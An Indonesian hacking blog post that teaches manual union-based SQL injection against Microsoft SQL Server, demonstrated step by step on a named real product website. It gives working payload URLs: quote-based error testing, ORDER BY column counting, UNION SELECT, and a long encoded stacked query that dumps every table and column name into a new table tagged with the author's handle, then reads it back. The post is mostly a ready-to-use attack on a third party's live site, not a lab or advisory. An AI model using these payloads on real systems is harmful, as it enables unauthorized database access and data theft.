MSSQL INJECTION MANUAL VIA ANDROID


Assalamualaikum warahmatullahi wabarakatuh 😊

Ketemu lagi sama Gue, Gue cuma Benalu di Tim ini, hehee .
Kali ini gue mau sharing sedikit tentang Injection Union Bassed di Microsoft Server .
Manual yaa tanpa bantuan tools Hekbar atau semacamnya (Anti tools tools club xD) πŸ˜„

Pasti dah gak asing lagi yaa dengan SQL INJECTION, kalo belum tau bisa baca disini .

Oke, sekarang kita coba meginjeksi ke website target, kebetulan gue udah ada target MsSql Injection :)
http://aventia.in/productdetails.aspx?id=215



Nah, untuk mengetahui web itu vuln atau tidak terhadap sql, kita coba kasih tanda ( ' ) atau tanda lainnya yang ada disini setelah angka, seperti ini :
http://aventia.in/productdetails.aspx?id=215'

Jika vuln akan menampilkan pesan kurang lebih seperti ini :
You have an error in your SQL syntax; check the mnual that corresponds to your MySQL. server version for the right syntax to use near " order by id desc' at line 1 "

Atau bisa juga, seperti gambar error, atau seperti tulisan pada gambar dibawah ini, dan masih banyak lagi :D



Oke, jika seperti itu kita lanjut menginjeksi dengan perintah order by sampai ketemu error yaa ..
cek dibawah :

http://aventia.in/productdetails.aspx?id=215'order+by+1+--+- (no error)
http://aventia.in/productdetails.aspx?id=215'order+by+2+--+- (no error)
http://aventia.in/productdetails.aspx?id=215' order by 3 -- - (no error)
http://aventia.in/productdetails.aspx?id=215'order+by+4+--+- (error)
* %20, spasi, sama + sama ya gays hehee 

Lebih jelasnya cek gambar dibawah gays 😁


Oke, kita sudah tau yaa ada berapa jumlah kolom yang teraedia pada website tersebut .
Kitaa coba cari angka dimana database ini diletakkan dengan menggunakan UNION SELECT 😁

DAN JANGAN LUPA MENAMBAHKAN KARAKTER (-) DIDEPAN PARAMETER YAAK :3
*(-)(.)

http://aventia.in/productdetails.aspx?id=-215'union select 1,2,3 -- -

lebih jelasnya cek gambar dibawah :*


Ezz sangat bukan? Tanpa bypass-bypass club, hehee ..
Jangan khawatir kalo harus dibypass, kita sudah bahas pada post sebelumnya, cek disini .

Oke sekarang coba kita masukkan dios MSSQL INJECTIONNYA, kurang lebih seperti dibawah ini :

;begin%20declare%20@x%20varchar(8000),%20@y%20int,%20@z%20varchar(50),%20@a%20varchar(100)%20declare%20@myTbl%20table%20(name%20varchar(8000)%20not%20null)%20SET%20@y=1%20SET%20@x=%27Owned%20by%20LoveTeeN72::%20%27%2b@@version%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Database%20:%20%27%2bdb_name()%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%20SET%20@z=%27%27%20SET%20@a=%27%27%20WHILE%20@y%3C=(SELECT%20COUNT(table_name)%20from%20INFORMATION_SCHEMA.TABLES)%20begin%20SET%20@a=%27%27%20Select%20@z=table_name%20from%20INFORMATION_SCHEMA.TABLES%20where%20TABLE_NAME%20not%20in%20(select%20name%20from%20@myTbl)%20select%20@a=@a%20%2b%20column_name%2b%27%20:%20%27%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_NAME=@z%20insert%20@myTbl%20values(@z)%20SET%20@x=@x%20%2b%20%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Table:%20%27%2b@z%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Columns%20:%20%27%2b@a%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%20SET%20@y%20=%20@y%2b1%20end%20select%20@x%20as%20output%20into%20LoveTeeN%20END--

*Note : Owned by dan output into bisa kalian ganti dengan nick kalian sendiri, dios ini mungkin sering kalian temukan di website yang membahas tentang masalah ini,


Oke, kurang lebih querynya seperti ini, ini digunakan biar lebih simple query manggil outputnya saja yaak .
Cek Gambar dibawahnya 😁

http://aventia.in/productdetails.aspx?id=-215%27;begin%20declare%20@x%20varchar(8000),%20@y%20int,%20@z%20varchar(50),%20@a%20varchar(100)%20declare%20@myTbl%20table%20(name%20varchar(8000)%20not%20null)%20SET%20@y=1%20SET%20@x=%27Owned%20by%20LoveTeeN72::%20%27%2b@@version%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Database%20:%20%27%2bdb_name()%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%20SET%20@z=%27%27%20SET%20@a=%27%27%20WHILE%20@y%3C=(SELECT%20COUNT(table_name)%20from%20INFORMATION_SCHEMA.TABLES)%20begin%20SET%20@a=%27%27%20Select%20@z=table_name%20from%20INFORMATION_SCHEMA.TABLES%20where%20TABLE_NAME%20not%20in%20(select%20name%20from%20@myTbl)%20select%20@a=@a%20%2b%20column_name%2b%27%20:%20%27%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_NAME=@z%20insert%20@myTbl%20values(@z)%20SET%20@x=@x%20%2b%20%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Table:%20%27%2b@z%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b%27Columns%20:%20%27%2b@a%2b%20CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%20SET%20@y%20=%20@y%2b1%20end%20select%20@x%20as%20output%20into%20LoveTeeN%20END--

Kamu lihat? LoveTeeN in the database 😁



Oke, sekarang kita panggil outputnya, yaitu LoveTeeN 😁
Kurang lebih seperti ini :

http://aventia.in/productdetails.aspx?id=215'and 1=(select output from LoveTeeN)+--+



DuuuuuummmmnnnnπŸ˜„
Untuk Dump nya liat dan ikutin query saja yaaa 😁
Copas? Cantumkan sumber biar dihargai ☺
Titip nick yaaak TN72 dan Garuda Tersakti 72 😘

Sekian yang bisa gue sharing kali ini, bukan bermaksud untuk menggurui rekan rekan sekalianπŸ˜‚
Keep Learn, Like, And Share~

Thanks for reading 😝

Related Posts:


0 Response to "MSSQL INJECTION MANUAL VIA ANDROID"

Post a Comment